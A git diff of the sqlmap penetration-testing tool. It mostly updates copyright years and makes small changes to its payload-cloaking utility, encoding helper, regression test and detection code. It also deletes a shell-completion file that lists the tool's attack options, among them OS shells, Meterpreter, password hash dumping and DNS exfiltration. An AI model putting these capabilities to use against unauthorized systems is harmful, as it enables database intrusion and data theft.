||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
8
extra/cloak/cloak.py
Normal file → Executable file
8
extra/cloak/cloak.py
Normal file → Executable file
|
@ -3,13 +3,13 @@
|
||||||
"""
|
"""
|
||||||
cloak.py - Simple file encryption/compression utility
|
cloak.py - Simple file encryption/compression utility
|
||||||
|
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import bz2
|
|
||||||
import os
|
import os
|
||||||
import sys
|
import sys
|
||||||
|
import zlib
|
||||||
|
|
||||||
from optparse import OptionError
|
from optparse import OptionError
|
||||||
from optparse import OptionParser
|
from optparse import OptionParser
|
||||||
|
@ -26,7 +26,7 @@ def hideAscii(data):
|
||||||
|
|
||||||
def cloak(inputFile):
|
def cloak(inputFile):
|
||||||
f = open(inputFile, 'rb')
|
f = open(inputFile, 'rb')
|
||||||
data = bz2.compress(f.read())
|
data = zlib.compress(f.read())
|
||||||
f.close()
|
f.close()
|
||||||
|
|
||||||
return hideAscii(data)
|
return hideAscii(data)
|
||||||
|
@ -34,7 +34,7 @@ def cloak(inputFile):
|
||||||
def decloak(inputFile):
|
def decloak(inputFile):
|
||||||
f = open(inputFile, 'rb')
|
f = open(inputFile, 'rb')
|
||||||
try:
|
try:
|
||||||
data = bz2.decompress(hideAscii(f.read()))
|
data = zlib.decompress(hideAscii(f.read()))
|
||||||
except:
|
except:
|
||||||
print 'ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile
|
print 'ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile
|
||||||
sys.exit(1)
|
sys.exit(1)
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -3,7 +3,7 @@
|
||||||
"""
|
"""
|
||||||
dbgtool.py - Portable executable to ASCII debug script converter
|
dbgtool.py - Portable executable to ASCII debug script converter
|
||||||
|
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
Binary file not shown.
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -3,7 +3,7 @@
|
||||||
"""
|
"""
|
||||||
safe2bin.py - Simple safe(hex) to binary format converter
|
safe2bin.py - Simple safe(hex) to binary format converter
|
||||||
|
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -50,7 +50,7 @@ def safecharencode(value):
|
||||||
for char in SAFE_ENCODE_SLASH_REPLACEMENTS:
|
for char in SAFE_ENCODE_SLASH_REPLACEMENTS:
|
||||||
retVal = retVal.replace(char, repr(char).strip('\''))
|
retVal = retVal.replace(char, repr(char).strip('\''))
|
||||||
|
|
||||||
retVal = reduce(lambda x, y: x + (y if (y in string.printable or ord(y) > 255) else '\\x%02x' % ord(y)), retVal, (unicode if isinstance(value, unicode) else str)())
|
retVal = reduce(lambda x, y: x + (y if (y in string.printable or isinstance(value, unicode) and ord(y) >= 160) else '\\x%02x' % ord(y)), retVal, (unicode if isinstance(value, unicode) else str)())
|
||||||
|
|
||||||
retVal = retVal.replace(SLASH_MARKER, "\\\\")
|
retVal = retVal.replace(SLASH_MARKER, "\\\\")
|
||||||
elif isinstance(value, list):
|
elif isinstance(value, list):
|
||||||
|
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -1,177 +0,0 @@
|
||||||
#compdef sqlmap.py
|
|
||||||
|
|
||||||
# sqlmap completion commands. written by kost
|
|
||||||
# put this file in your zsh completion dir and restart your shell. Zsh completion dir is usually
|
|
||||||
# located somewhere in /usr/share/zsh/ or /usr/local/share/zsh
|
|
||||||
|
|
||||||
local curcontext="$curcontext" state line
|
|
||||||
|
|
||||||
_arguments -C -s \
|
|
||||||
'(- *)'{--help,-h}'[Show basic help message and exit]' \
|
|
||||||
'(- *)'-hh'[Show advanced help message and exit]' \
|
|
||||||
'(-v)'-v+'[Verbosity level: 0-6 (default 1)]:Verbosity level (0-6) - default 1' \
|
|
||||||
'(-d)'-d+'[Direct connection to the database]' \
|
|
||||||
'(-u,--url)'{-u+,--url=-}'[Target url]' \
|
|
||||||
'(-g)'-g+'[Process Google dork results as target urls]' \
|
|
||||||
'(--data)'--data=-'[Data string to be sent through POST]' \
|
|
||||||
'(-l)'-l+'[Parse targets from Burp or WebScarab proxy logs]:LOGFILE:_files' \
|
|
||||||
'(-m)'-m+'[Scan multiple targets enlisted in a given textual file]:BULKFILE:_files' \
|
|
||||||
'(-r)'-r+'[Load HTTP request from a file]:REQUESTFILE:_files' \
|
|
||||||
'(-s)'-s+'[Load session from a stored (.sqlite) file]:SESSIONFILE:_files' \
|
|
||||||
'(-c)'-c+'[Load options from a configuration INI file]:CONFIGFILE:_files' \
|
|
||||||
'(--param-del)'--param-del=-'[Character used for splitting parameter values]:PDEL' \
|
|
||||||
'(--cookie)'--cookie=-'[HTTP Cookie header]:COOKIE' \
|
|
||||||
'(--load-cookies)'--load-cookies=-'[File containing cookies in Netscape/wget format]:COOKIEFILE:_files' \
|
|
||||||
'(--drop-set-cookie)'--drop-set-cookie'[Ignore Set-Cookie header from response]' \
|
|
||||||
'(--user-agent)'--user-agent=-'[HTTP User-Agent header]:HTTP User Agent' \
|
|
||||||
'(--random-agent)'--random-agent'[Use randomly selected HTTP User-Agent header]' \
|
|
||||||
'(--randomize)'--randomize=-'[Randomly change value for given parameter(s)]:RPARAM' \
|
|
||||||
'(--force-ssl)'--force-ssl'[Force usage of SSL/HTTPS requests]' \
|
|
||||||
'(--host)'--host=-'[HTTP Host header]:Host Header' \
|
|
||||||
'(--referer)'--referer=-'[HTTP Referer header]:REFERER' \
|
|
||||||
'(--headers)'--headers=-'[Extra headers (e.g. Accept-Language: fr\nETag: 123)]:HEADERS' \
|
|
||||||
'(--auth-type)'--auth-type=-'[HTTP authentication type (Basic, Digest or NTLM)]:ATYPE' \
|
|
||||||
'(--auth-cred)'--auth-cred=-'[HTTP authentication credentials (name:password)]:ACRED' \
|
|
||||||
'(--auth-cert)'--auth-cert=-'[HTTP authentication certificate (key_file,cert_file)]:ACERT:_files' \
|
|
||||||
'(--proxy)'--proxy=-'[Use a HTTP proxy to connect to the target url]:PROXY' \
|
|
||||||
'(--proxy-cred)'--proxy-cred=-'[HTTP proxy authentication credentials (name:password)]:PCRED' \
|
|
||||||
'(--ignore-proxy)'--ignore-proxy'[Ignore system default HTTP proxy]' \
|
|
||||||
'(--delay)'--delay=-'[Delay in seconds between each HTTP request]:DELAY' \
|
|
||||||
'(--timeout)'--timeout=-'[Seconds to wait before timeout connection (default 30)]:TIMEOUT' \
|
|
||||||
'(--retries)'--retries=-'[Retries when the connection timeouts (default 3)]:RETRIES' \
|
|
||||||
'(--scope)'--scope=-'[Regexp to filter targets from provided proxy log]:SCOPE' \
|
|
||||||
'(--safe-url)'--safe-url=-'[Url address to visit frequently during testing]:SAFURL' \
|
|
||||||
'(--safe-freq)'--safe-freq=-'[Test requests between two visits to a given safe url]:SAFREQ' \
|
|
||||||
'(--skip-urlencode)'--skip-urlencode'[Skip URL encoding of payload data]' \
|
|
||||||
'(--eval)'--eval=-'[Evaluate provided Python code before the request (e.g.]:EVALCODE' \
|
|
||||||
'(-o)'-o'[Turn on all optimization switches]' \
|
|
||||||
'(--predict-output)'--predict-output'[Predict common queries output]' \
|
|
||||||
'(--keep-alive)'--keep-alive'[Use persistent HTTP(s) connections]' \
|
|
||||||
'(--null-connection)'--null-connection'[Retrieve page length without actual HTTP response body]' \
|
|
||||||
'(--threads)'--threads=-'[Max number of concurrent HTTP(s) requests (default 1)]:THREADS' \
|
|
||||||
'(-p)'-p+'[Testable parameter(s)]:TESTPARAMETER' \
|
|
||||||
'(--dbms)'--dbms=-'[Force back-end DBMS to this value]:DBMS:->list-dbms' \
|
|
||||||
'(--os)'--os=-'[Force back-end DBMS operating system to this value]:OS:->list-os' \
|
|
||||||
'(--invalid-bignum)'--invalid-bignum'[Use big numbers for invalidating values]' \
|
|
||||||
'(--invalid-logical)'--invalid-logical'[Use logical operations for invalidating values]' \
|
|
||||||
'(--no-cast)'--no-cast'[Turn off payload casting mechanism]' \
|
|
||||||
'(--no-escape)'--no-unescape'[Turn off string escaping mechanism]' \
|
|
||||||
'(--prefix)'--prefix=-'[Injection payload prefix string]:PREFIX' \
|
|
||||||
'(--suffix)'--suffix=-'[Injection payload suffix string]:SUFFIX' \
|
|
||||||
'(--skip)'--skip=-'[Skip testing for given parameter(s)]:SKIP' \
|
|
||||||
'(--tamper)'--tamper=-'[Use given script(s) for tampering injection data]:TAMPER' \
|
|
||||||
'(--level)'--level=-'[Level of tests to perform (1-5, default 1)]:LEVEL (1-5), default 1' \
|
|
||||||
'(--risk)'--risk=-'[Risk of tests to perform (0-3, default 1)]:RISK (0-3), default 1' \
|
|
||||||
'(--string)'--string=-'[String to match when query is evaluated to True]:STRING' \
|
|
||||||
'(--not-string)'--not-string=-'[String to match when query is evaluated to False]:NOTSTRING' \
|
|
||||||
'(--regexp)'--regexp=-'[Regexp to match when query is evaluated to True]:REGEXP' \
|
|
||||||
'(--code)'--code=-'[HTTP code to match when query is evaluated to True]' \
|
|
||||||
'(--text-only)'--text-only'[Compare pages based only on the textual content]' \
|
|
||||||
'(--titles)'--titles'[Compare pages based only on their titles]' \
|
|
||||||
'(--technique)'--technique=-'[SQL injection techniques to test for (default "BEUSTQ")]:TECH:->list-techniques' \
|
|
||||||
'(--time-sec)'--time-sec=-'[Seconds to delay the DBMS response (default 5)]:TIMESEC' \
|
|
||||||
'(--union-cols)'--union-cols=-'[Range of columns to test for UNION query SQL injection]:UCOLS' \
|
|
||||||
'(--union-char)'--union-char=-'[Character to use for bruteforcing number of columns]:UCHAR' \
|
|
||||||
'(--dns-domain)'--dns-domain=-'[Domain name used for DNS exfiltration attack]:DNSDOMAIN' \
|
|
||||||
'(--second-order)'--second-order=-'[Resulting page url searched for second-order response]:SECONDORDER' \
|
|
||||||
'(-f,--fingerprint)'{-f,--fingerprint}'[Perform an extensive DBMS version fingerprint]' \
|
|
||||||
'(-a,--all)'{-a,--all}'[Retrieve everything]' \
|
|
||||||
'(-b,--banner)'{-b,--banner}'[Retrieve DBMS banner]' \
|
|
||||||
'(--current-user)'--current-user'[Retrieve DBMS current user]' \
|
|
||||||
'(--current-db)'--current-db'[Retrieve DBMS current database]' \
|
|
||||||
'(--hostname)'--hostname'[Retrieve DBMS server hostname]' \
|
|
||||||
'(--is-dba)'--is-dba'[Detect if the DBMS current user is DBA]' \
|
|
||||||
'(--users)'--users'[Enumerate DBMS users]' \
|
|
||||||
'(--passwords)'--passwords'[Enumerate DBMS users password hashes]' \
|
|
||||||
'(--privileges)'--privileges'[Enumerate DBMS users privileges]' \
|
|
||||||
'(--roles)'--roles'[Enumerate DBMS users roles]' \
|
|
||||||
'(--dbs)'--dbs'[Enumerate DBMS databases]' \
|
|
||||||
'(--tables)'--tables'[Enumerate DBMS database tables]' \
|
|
||||||
'(--columns)'--columns'[Enumerate DBMS database table columns]' \
|
|
||||||
'(--schema)'--schema'[Enumerate DBMS schema]' \
|
|
||||||
'(--count)'--count'[Retrieve number of entries for table(s)]' \
|
|
||||||
'(--dump)'--dump'[Dump DBMS database table entries]' \
|
|
||||||
'(--dump-all)'--dump-all'[Dump all DBMS databases tables entries]' \
|
|
||||||
'(--search)'--search'[Search column(s), table(s) and/or database name(s)]' \
|
|
||||||
'(-D)'-D+'[DBMS database to enumerate]:DB' \
|
|
||||||
'(-T)'-T+'[DBMS database table to enumerate]:TBL' \
|
|
||||||
'(-C)'-C+'[DBMS database table column to enumerate]:COL' \
|
|
||||||
'(-U)'-U+'[DBMS user to enumerate]:USER' \
|
|
||||||
'(--exclude-sysdbs)'--exclude-sysdbs'[Exclude DBMS system databases when enumerating tables]' \
|
|
||||||
'(--start)'--start=-'[First query output entry to retrieve]:LIMITSTART' \
|
|
||||||
'(--stop)'--stop=-'[Last query output entry to retrieve]:LIMITSTOP' \
|
|
||||||
'(--first)'--first=-'[First query output word character to retrieve]:FIRSTCHAR' \
|
|
||||||
'(--last)'--last=-'[Last query output word character to retrieve]:LASTCHAR' \
|
|
||||||
'(--sql-query)'--sql-query=-'[SQL statement to be executed]:QUERY' \
|
|
||||||
'(--sql-shell)'--sql-shell'[Prompt for an interactive SQL shell]' \
|
|
||||||
'(--sql-file)'--sql-file=-'[Execute SQL statements from given file(s)]:SQLFILE:_files' \
|
|
||||||
'(--common-tables)'--common-tables'[Check existence of common tables]' \
|
|
||||||
'(--common-columns)'--common-columns'[Check existence of common columns]' \
|
|
||||||
'(--udf-inject)'--udf-inject'[Inject custom user-defined functions]' \
|
|
||||||
'(--shared-lib)'--shared-lib=-'[Local path of the shared library]:SHLIB' \
|
|
||||||
'(--file-read)'--file-read=-'[Read a file from the back-end DBMS file system]:RFILE' \
|
|
||||||
'(--file-write)'--file-write=-'[Write a local file on the back-end DBMS file system]:WFILE' \
|
|
||||||
'(--file-dest)'--file-dest=-'[Back-end DBMS absolute filepath to write to]:DFILE' \
|
|
||||||
'(--os-cmd)'--os-cmd=-'[Execute an operating system command]:OSCMD' \
|
|
||||||
'(--os-shell)'--os-shell'[Prompt for an interactive operating system shell]' \
|
|
||||||
'(--os-pwn)'--os-pwn'[Prompt for an out-of-band shell, meterpreter or VNC]' \
|
|
||||||
'(--os-smbrelay)'--os-smbrelay'[One click prompt for an OOB shell, meterpreter or VNC]' \
|
|
||||||
'(--os-bof)'--os-bof'[Stored procedure buffer overflow exploitation]' \
|
|
||||||
'(--priv-esc)'--priv-esc'[Database process user privilege escalation]' \
|
|
||||||
'(--msf-path)'--msf-path=-'[Local path where Metasploit Framework is installed]:MSFPATH' \
|
|
||||||
'(--tmp-path)'--tmp-path=-'[Remote absolute path of temporary files directory]:TMPPATH' \
|
|
||||||
'(--reg-read)'--reg-read'[Read a Windows registry key value]' \
|
|
||||||
'(--reg-add)'--reg-add'[Write a Windows registry key value data]' \
|
|
||||||
'(--reg-del)'--reg-del'[Delete a Windows registry key value]' \
|
|
||||||
'(--reg-key)'--reg-key=-'[Windows registry key]:REGKEY' \
|
|
||||||
'(--reg-value)'--reg-value=-'[Windows registry key value]:REGVAL' \
|
|
||||||
'(--reg-data)'--reg-data=-'[Windows registry key value data]:REGDATA' \
|
|
||||||
'(--reg-type)'--reg-type=-'[Windows registry key value type]:REGTYPE' \
|
|
||||||
'(-t)'-t+'[Log all HTTP traffic into a textual file]:TRAFFICFILE' \
|
|
||||||
'(--batch)'--batch'[Never ask for user input, use the default behaviour]' \
|
|
||||||
'(--charset)'--charset=-'[Force character encoding used for data retrieval]:CHARSET' \
|
|
||||||
'(--check-tor)'--check-tor'[Check to see if Tor is used properly]' \
|
|
||||||
'(--crawl)'--crawl=-'[Crawl the website starting from the target url]:CRAWLDEPTH' \
|
|
||||||
'(--csv-del)'--csv-del=-'[Delimiting character used in CSV output (default is ,)]:CSVDEL' \
|
|
||||||
'(--dbms-cred)'--dbms-cred=-'[DBMS authentication credentials (user:password)]:DBMS authentication credentials' \
|
|
||||||
'(--eta)'--eta'[Display for each output the estimated time of arrival]' \
|
|
||||||
'(--flush-session)'--flush-session'[Flush session files for current target]' \
|
|
||||||
'(--forms)'--forms'[Parse and test forms on target url]' \
|
|
||||||
'(--fresh-queries)'--fresh-queries'[Ignores query results stored in session file]' \
|
|
||||||
'(--hex)'--hex'[Uses DBMS hex function(s) for data retrieval]' \
|
|
||||||
'(--output-dir)'--output-dir=-'[Custom output directory path]:ODIR' \
|
|
||||||
'(--parse-errors)'--parse-errors'[Parse and display DBMS error messages from responses]' \
|
|
||||||
'(--save)'--save'[Save options to a configuration INI file]' \
|
|
||||||
'(--tor)'--tor'[Use Tor anonymity network]' \
|
|
||||||
'(--tor-port)'--tor-port=-'[Set Tor proxy port other than default]:TORPORT' \
|
|
||||||
'(--tor-type)'--tor-type=-'[Set Tor proxy type (HTTP - default, SOCKS4 or SOCKS5)]:TORTYPE' \
|
|
||||||
'(--update)'--update'[Update sqlmap]' \
|
|
||||||
'(-z)'-z+'[Use short mnemonics (e.g. flu,bat,ban,tec=EU)]:MNEMONICS' \
|
|
||||||
'(--check-payload)'--check-payload'[Offline WAF/IPS/IDS payload detection testing]' \
|
|
||||||
'(--check-waf)'--check-waf'[Check for existence of WAF/IPS/IDS protection]' \
|
|
||||||
'(--cleanup)'--cleanup'[Clean up the DBMS by sqlmap specific UDF and tables]' \
|
|
||||||
'(--dependencies)'--dependencies'[Check for missing (non-core) sqlmap dependencies]' \
|
|
||||||
'(--disable-coloring)'--disable-coloring'[Disable console output coloring]' \
|
|
||||||
'(--gpage)'--gpage=-'[Use Google dork results from specified page number]:GOOGLEPAGE' \
|
|
||||||
'(--mobile)'--mobile'[Imitate smartphone through HTTP User-Agent header]' \
|
|
||||||
'(--page-rank)'--page-rank'[Display page rank (PR) for Google dork results]' \
|
|
||||||
'(--purge-output)'--purge-output'[Safely remove all content from output directory]' \
|
|
||||||
'(--smart)'--smart'[Conduct through tests only if positive heuristic(s)]' \
|
|
||||||
'(--test-filter)'--test-filter=-'[Select tests by payloads and/or titles (e.g. ROW)]:test-filter' \
|
|
||||||
'(--wizard)'--wizard'[Simple wizard interface for beginner users]' && return 0
|
|
||||||
|
|
||||||
case "$state" in
|
|
||||||
list-dbms)
|
|
||||||
_values -S : 'DBMS' 'access' 'db2' 'firebird' 'maxdb' 'mssqlserver' 'mysql' 'oracle' 'postgresql' \
|
|
||||||
'sqlite' 'sybase'
|
|
||||||
;;
|
|
||||||
list-os)
|
|
||||||
_values -S : 'os' 'Linux' 'Windows'
|
|
||||||
;;
|
|
||||||
list-techniques)
|
|
||||||
_values -S : 'technique' \
|
|
||||||
'B[Boolean]' 'E[Error]' 'U[Union]' 'S[Stacked]' 'T[Time]'
|
|
||||||
;;
|
|
||||||
esac
|
|
||||||
|
|
||||||
return 0
|
|
|
@ -1,6 +1,6 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
# Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
# See the file 'doc/COPYING' for copying permission
|
# See the file 'doc/COPYING' for copying permission
|
||||||
|
|
||||||
# Removes duplicate entries in wordlist like files
|
# Removes duplicate entries in wordlist like files
|
||||||
|
|
7
extra/shutils/regressiontest.py
Normal file → Executable file
7
extra/shutils/regressiontest.py
Normal file → Executable file
|
@ -1,6 +1,6 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
# Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
# See the file 'doc/COPYING' for copying permission
|
# See the file 'doc/COPYING' for copying permission
|
||||||
|
|
||||||
import codecs
|
import codecs
|
||||||
|
@ -31,6 +31,7 @@ FROM = "regressiontest@sqlmap.org"
|
||||||
#TO = "dev@sqlmap.org"
|
#TO = "dev@sqlmap.org"
|
||||||
TO = ["bernardo.damele@gmail.com", "miroslav.stampar@gmail.com"]
|
TO = ["bernardo.damele@gmail.com", "miroslav.stampar@gmail.com"]
|
||||||
SUBJECT = "regression test started on %s using revision %s" % (START_TIME, REVISION)
|
SUBJECT = "regression test started on %s using revision %s" % (START_TIME, REVISION)
|
||||||
|
TARGET = "debian"
|
||||||
|
|
||||||
def prepare_email(content):
|
def prepare_email(content):
|
||||||
global FROM
|
global FROM
|
||||||
|
@ -83,7 +84,7 @@ def main():
|
||||||
if stderr:
|
if stderr:
|
||||||
failure_email("Execution of regression test failed with error:\n\n%s" % stderr)
|
failure_email("Execution of regression test failed with error:\n\n%s" % stderr)
|
||||||
|
|
||||||
failed_tests = re.findall("running live test case: (.+?) \((\d+)\/\d+\)[\r]*\n.+test failed (at parsing item \"(.+)\" )?\- scan folder: (\/.+) \- traceback: (.*?)( - SQL injection not detected)?[\r]*\n", stdout, re.M)
|
failed_tests = re.findall("running live test case: (.+?) \((\d+)\/\d+\)[\r]*\n.+test failed (at parsing items: (.+))?\s*\- scan folder: (\/.+) \- traceback: (.*?)( - SQL injection not detected)?[\r]*\n", stdout, re.M)
|
||||||
|
|
||||||
for failed_test in failed_tests:
|
for failed_test in failed_tests:
|
||||||
title = failed_test[0]
|
title = failed_test[0]
|
||||||
|
@ -96,7 +97,7 @@ def main():
|
||||||
test_counts.append(test_count)
|
test_counts.append(test_count)
|
||||||
|
|
||||||
console_output_file = os.path.join(output_folder, "console_output")
|
console_output_file = os.path.join(output_folder, "console_output")
|
||||||
log_file = os.path.join(output_folder, "debiandev", "log")
|
log_file = os.path.join(output_folder, TARGET, "log")
|
||||||
traceback_file = os.path.join(output_folder, "traceback")
|
traceback_file = os.path.join(output_folder, "traceback")
|
||||||
|
|
||||||
if os.path.exists(console_output_file):
|
if os.path.exists(console_output_file):
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -46,6 +46,7 @@ from lib.core.datatype import AttribDict
|
||||||
from lib.core.datatype import InjectionDict
|
from lib.core.datatype import InjectionDict
|
||||||
from lib.core.decorators import cachedmethod
|
from lib.core.decorators import cachedmethod
|
||||||
from lib.core.dicts import FROM_DUMMY_TABLE
|
from lib.core.dicts import FROM_DUMMY_TABLE
|
||||||
|
from lib.core.enums import CUSTOM_LOGGING
|
||||||
from lib.core.enums import DBMS
|
from lib.core.enums import DBMS
|
||||||
from lib.core.enums import HEURISTIC_TEST
|
from lib.core.enums import HEURISTIC_TEST
|
||||||
from lib.core.enums import HTTP_HEADER
|
from lib.core.enums import HTTP_HEADER
|
||||||
|
@ -53,17 +54,22 @@ from lib.core.enums import HTTPMETHOD
|
||||||
from lib.core.enums import NULLCONNECTION
|
from lib.core.enums import NULLCONNECTION
|
||||||
from lib.core.enums import PAYLOAD
|
from lib.core.enums import PAYLOAD
|
||||||
from lib.core.enums import PLACE
|
from lib.core.enums import PLACE
|
||||||
|
from lib.core.enums import REDIRECTION
|
||||||
from lib.core.exception import SqlmapConnectionException
|
from lib.core.exception import SqlmapConnectionException
|
||||||
from lib.core.exception import SqlmapNoneDataException
|
from lib.core.exception import SqlmapNoneDataException
|
||||||
from lib.core.exception import SqlmapSilentQuitException
|
from lib.core.exception import SqlmapSilentQuitException
|
||||||
from lib.core.exception import SqlmapUserQuitException
|
from lib.core.exception import SqlmapUserQuitException
|
||||||
|
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
||||||
|
from lib.core.settings import DUMMY_XSS_CHECK_APPENDIX
|
||||||
from lib.core.settings import FORMAT_EXCEPTION_STRINGS
|
from lib.core.settings import FORMAT_EXCEPTION_STRINGS
|
||||||
from lib.core.settings import HEURISTIC_CHECK_ALPHABET
|
from lib.core.settings import HEURISTIC_CHECK_ALPHABET
|
||||||
from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH
|
from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH
|
||||||
from lib.core.settings import UNKNOWN_DBMS
|
from lib.core.settings import SUPPORTED_DBMS
|
||||||
|
from lib.core.settings import URI_HTTP_HEADER
|
||||||
from lib.core.settings import LOWER_RATIO_BOUND
|
from lib.core.settings import LOWER_RATIO_BOUND
|
||||||
from lib.core.settings import UPPER_RATIO_BOUND
|
from lib.core.settings import UPPER_RATIO_BOUND
|
||||||
from lib.core.settings import IDS_WAF_CHECK_PAYLOAD
|
from lib.core.settings import IDS_WAF_CHECK_PAYLOAD
|
||||||
|
from lib.core.settings import IDS_WAF_CHECK_RATIO
|
||||||
from lib.core.threads import getCurrentThreadData
|
from lib.core.threads import getCurrentThreadData
|
||||||
from lib.request.connect import Connect as Request
|
from lib.request.connect import Connect as Request
|
||||||
from lib.request.inject import checkBooleanExpression
|
from lib.request.inject import checkBooleanExpression
|
||||||
|
@ -82,31 +88,52 @@ def checkSqlInjection(place, parameter, value):
|
||||||
# Set the flag for SQL injection test mode
|
# Set the flag for SQL injection test mode
|
||||||
kb.testMode = True
|
kb.testMode = True
|
||||||
|
|
||||||
for test in getSortedInjectionTests():
|
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
|
||||||
|
tests = getSortedInjectionTests()
|
||||||
|
|
||||||
|
while tests:
|
||||||
|
test = tests.pop(0)
|
||||||
|
|
||||||
try:
|
try:
|
||||||
if kb.endDetection:
|
if kb.endDetection:
|
||||||
break
|
break
|
||||||
|
|
||||||
if conf.dbms is None:
|
if conf.dbms is None:
|
||||||
|
# If the DBMS has not yet been fingerprinted (via simple heuristic check
|
||||||
|
# or via DBMS-specific payload) and boolean-based blind has been identified
|
||||||
|
# then attempt to identify with a simple DBMS specific boolean-based
|
||||||
|
# test what the DBMS may be
|
||||||
if not injection.dbms and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data:
|
if not injection.dbms and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data:
|
||||||
if not Backend.getIdentifiedDbms() and not kb.heuristicDbms:
|
